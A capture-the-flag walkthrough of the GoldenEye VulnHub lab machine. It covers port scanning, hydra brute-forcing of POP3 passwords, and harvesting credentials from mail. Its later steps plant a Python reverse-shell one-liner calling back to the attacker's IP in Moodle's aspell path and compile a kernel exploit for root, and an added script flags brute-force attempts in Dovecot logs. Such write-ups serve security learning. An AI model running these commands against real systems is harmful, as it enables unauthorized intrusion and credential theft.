Preface
⏰ Date: 2023.7.15
🗺️ Target VM: https://download.vulnhub.com/goldeneye/GoldenEye-v1.ova
⚠️ Everything in this article was done in a lab VM environment; never use it against real systems without authorization.
🙏 My skills are limited; corrections are welcome. Thanks for reading!
🎉 Feel free to follow 🔍, like 👍, bookmark ⭐️ and comment 📝
Information gathering
Port scan with masscan
Service scan with nmap
┌──(root㉿kali)-[/home/eric/myfile]
└─# nmap -sS -A -T4 -v -p 25,80,55007,55006 192.168.58.148
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ubuntu
| Issuer: commonName=ubuntu
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:22:34
| Not valid after: 2028-04-21T03:22:34
| MD5: cd4a:d178:f216:17fb:21a6:0a16:8f46:c8c6
|_SHA-1: fda3:fc7b:6601:4746:96aa:0f56:b126:1c29:36e8:442c
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after: 2028-04-23T03:23:52
| MD5: d039:2e71:c76a:2cb3:e694:ec40:7228:ec63
|_SHA-1: 9d6a:92eb:5f9f:e9ba:6cbd:dc93:55fa:5754:219b:0b77
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: SASL(PLAIN) UIDL USER PIPELINING AUTH-RESP-CODE RESP-CODES TOP CAPA
55007/tcp open pop3 Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after: 2028-04-23T03:23:52
| MD5: d039:2e71:c76a:2cb3:e694:ec40:7228:ec63
|_SHA-1: 9d6a:92eb:5f9f:e9ba:6cbd:dc93:55fa:5754:219b:0b77
|_pop3-capabilities: PIPELINING STLS USER UIDL SASL(PLAIN) CAPA RESP-CODES TOP AUTH-RESP-CODE
MAC Address: 00:0C:29:FE:2B:90 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.021 days (since Sat Jul 15 21:30:12 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE
HOP RTT ADDRESS
1 0.28 ms severnaya-station.com (192.168.58.148)
NSE: Script Post-scanning.
Initiating NSE at 22:00
Completed NSE at 22:00, 0.00s elapsed
Initiating NSE at 22:00
Completed NSE at 22:00, 0.00s elapsed
Initiating NSE at 22:00
Completed NSE at 22:00, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.93 seconds
Raw packets sent: 27 (1.982KB) | Rcvd: 19 (1.454KB)
Browse to port 80
The page hints that you should log in at /sev-home/
View the page source
Decoding tool: https://forum.ywhack.com/coding.php
The HTML entities decode to: InvincibleHack3r
After logging in, the page hints that POP3 is running on a non-default port
View the page source
POP3 brute force
We already know the usernames Boris and Natalya, and the hint says the default passwords were changed, so they can probably be brute-forced
hydra -L 1.txt -P /usr/share/wordlists/fasttrack.txt 192.168.58.148 -s 55007 pop3
[55007][pop3] host: 192.168.58.148 login: boris password: secret1!
[55007][pop3] host: 192.168.58.148 login: natalya password: bird
Connect with nc 192.168.58.148 55007
user boris
pass secret1!
list # show the number of messages
retr 1 # pick which message to read (1, 2, 3)
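From the defender's side, the hydra run above is loud: every guess leaves an "auth failed" line in the Dovecot log. Here is an added example (my own, not from the original post or the VM) that parses such lines and flags a client guessing passwords across several accounts in a short window; the log lines and thresholds are constructed for the demo, not captured from this box.

```python
# Added example for this write-up (not from the original post): flag a POP3
# password-guessing burst from Dovecot log lines. Log lines/thresholds are constructed.
import re
from collections import defaultdict
from datetime import datetime

# Dovecot logs each failed attempt as "Disconnected (auth failed, ...)" with
# the guessed account in user=<...> and the client address in rip=...
AUTH_FAIL = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ dovecot: pop3-login: "
    r"Disconnected \(auth failed, \d+ attempts in \d+ secs\): "
    r"user=<(?P<user>[^>]*)>, method=\S+, rip=(?P<rip>[\d.]+)"
)

def parse_failures(lines, year=2023):
    """Yield (timestamp, client_ip, username) for each failed-auth line."""
    for line in lines:
        m = AUTH_FAIL.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["rip"], m["user"]

def find_bruteforce(lines, max_failures=5, window_secs=60, min_users=2):
    """Return {client_ip: [accounts]} for clients with >= max_failures
    failures inside window_secs spread over >= min_users accounts; a
    single user mistyping a password twice is not flagged."""
    events = defaultdict(list)
    for ts, rip, user in parse_failures(lines):
        events[rip].append((ts, user))
    flagged = {}
    for rip, evs in sorted(events.items()):
        evs.sort()
        for i, (start, _) in enumerate(evs):
            users = [u for t, u in evs[i:] if (t - start).total_seconds() <= window_secs]
            if len(users) >= max_failures and len(set(users)) >= min_users:
                flagged[rip] = sorted(set(users))
                break
    return flagged

# Constructed sample: a burst against boris/natalya from one client (what a
# wordlist run leaves behind), then one stray failure and a real login elsewhere.
FAIL = ("{ts} ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in "
        "2 secs): user=<{u}>, method=PLAIN, rip={ip}, lip=192.168.58.148, session=<S{n}>")
SAMPLE_LOG = [
    FAIL.format(ts=f"Jul 15 22:05:0{1 + n // 2}", u=u, ip="192.168.58.128", n=n)
    for n, u in enumerate(["boris", "natalya"] * 3)
] + [
    FAIL.format(ts="Jul 15 22:10:40", u="xenia", ip="10.0.0.7", n=9),
    "Jul 15 22:10:55 ubuntu dovecot: pop3-login: Login: user=<xenia>, method=PLAIN, "
    "rip=10.0.0.7, lip=192.168.58.148, mpid=1234, TLS, session=<S10>",
]
```

Moving POP3 to port 55007 did not hide it from the scan above; rate-limiting or fail2ban-style blocking on these log lines is what actually slows a wordlist attack down.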
Boris's mailbox has nothing useful; Natalya's contains the following information
Add the domain severnaya-station.com to the local /etc/hosts file
Browse to severnaya-station.com/gnocertdir
username: xenia
password: RCP90rulez!
After logging in, doak's information is found under messages
Try brute-forcing doak's POP3 account
username: dr_doak
password: 4England!
After logging in, we get a file
It decodes to xWinter1995x!; log in as admin
Reverse shell
First set this option (the spell-check engine) to PSpellShell and save
Under System paths, enter the payload in "Path to aspell"
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.58.128",5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Listen on Kali: nc -nvlp 5555
Type anything here and click the button in the red box (the spell-check button); the shell comes back as soon as you click it
Use python to spawn an interactive shell
Check the kernel version
Found an exploit
The target has no gcc, but it does have cc
Upload the exploit to the target
cc 37292.c -o exp
./exp to escalate privileges